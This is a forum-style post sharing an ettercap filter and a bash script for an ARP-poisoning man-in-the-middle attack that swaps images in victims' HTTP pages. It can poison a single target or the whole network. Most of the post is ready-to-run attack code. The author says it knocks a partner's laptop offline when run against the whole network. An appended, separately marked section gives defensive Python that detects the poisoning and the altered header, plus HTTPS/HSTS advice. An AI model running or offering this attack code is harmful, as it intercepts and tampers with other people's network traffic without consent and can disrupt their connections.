I can't take credit for this; I simply took one of g0tmi1k's scripts (sslstrip/ettercap/urlsnarf) and whittled it down to a super simple image replacement script. So thanks to g0tmi1k, and here it is.
Preparation first! This is Irongeek's image replacement script; it has been updated from the original post on his blog. This filter is from the Binary Revolution forums.
Copy and paste that into a text file, and of course replace the URLs with whatever lovely images you would like.
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}
Save this as something like fun.filter
Now open a terminal, cd into the directory with fun.filter, and run this.
This makes the filter into something ettercap can read and apply.
Code:
etterfilter fun.filter -o fun.ef
Now iptables and running the script.
Edit your etter.conf and uncomment the ip_tables area like normal.
Copy and paste the following into a .txt file and save it as something like imagefun.sh
Again, you need to change the part of the ettercap line /root/ECfilters/new.ef to whatever path your filter is in. Now run the script!
Code:
#!/bin/bash
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ettercap -T -i $IFACE -F /root/ECfilters/new.ef -M arp:remote /$ROUTER/ /$VICTIM/ -P repoison_arp
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
This performs MUCH faster for me than the GUI-based ettercap filtering; however, I haven't tested it much and it seems to DoS my gf's laptop when I ARP the whole network, so please edit and improve this script if you like it. Thanks
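
The detection side of the setup in this post, as an added example that is not part of the original post: on a poisoned host several IPv4 addresses resolve to one MAC in the neighbour table, and the filter's same-length rewrite leaves a 15-character Accept* header with no Accept-Encoding in requests as the web server or an upstream proxy receives them. The function names and sample data are constructed for illustration.

```python
import re
from collections import defaultdict

# Header names beginning with "Accept" that browsers legitimately send.
KNOWN_ACCEPT = {"accept", "accept-encoding", "accept-language", "accept-charset"}

def shared_mac_ips(neigh_output):
    """Return {mac: [ips]} for every MAC that more than one IPv4 address maps to.

    Input is the text printed by `ip neigh show`. Under ARP poisoning the
    gateway's IP resolves to the same MAC as another host on the segment.
    """
    by_mac = defaultdict(set)
    for line in neigh_output.splitlines():
        m = re.match(r"(\d+\.\d+\.\d+\.\d+) .*\blladdr ([0-9a-f:]{17})\b",
                     line.strip(), re.I)
        if m:
            by_mac[m.group(2).lower()].add(m.group(1))
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def mangled_accept_headers(raw_request):
    """Return unknown Accept* header names when Accept-Encoding is missing.

    An in-flight rewrite that keeps the length of "Accept-Encoding" leaves a
    15-character header name that no browser sends.
    """
    lines = raw_request.split("\r\n")[1:]          # skip the request line
    names = [l.split(":", 1)[0].strip() for l in lines if ":" in l]
    lowered = {n.lower() for n in names}
    if "accept-encoding" in lowered:
        return []
    return [n for n in names
            if n.lower().startswith("accept")
            and n.lower() not in KNOWN_ACCEPT
            and len(n) == len("Accept-Encoding")]

# Constructed sample data (not captured from a real network).
SAMPLE_NEIGH = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.1.40 dev wlan0 lladdr 66:77:88:99:aa:bb REACHABLE
fe80::1 dev wlan0 lladdr 00:11:22:33:44:55 router STALE
"""
SAMPLE_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: example.test\r\n"
                  "Accept: text/html\r\nAccept-Rubbish!: gzip, deflate\r\n\r\n")

if __name__ == "__main__":
    print("IPs sharing a MAC:", shared_mac_ips(SAMPLE_NEIGH))
    print("Suspicious headers:", mangled_accept_headers(SAMPLE_REQUEST))
```

Serving pages over HTTPS with HSTS removes the cleartext port 80 traffic that both halves of the filter match on.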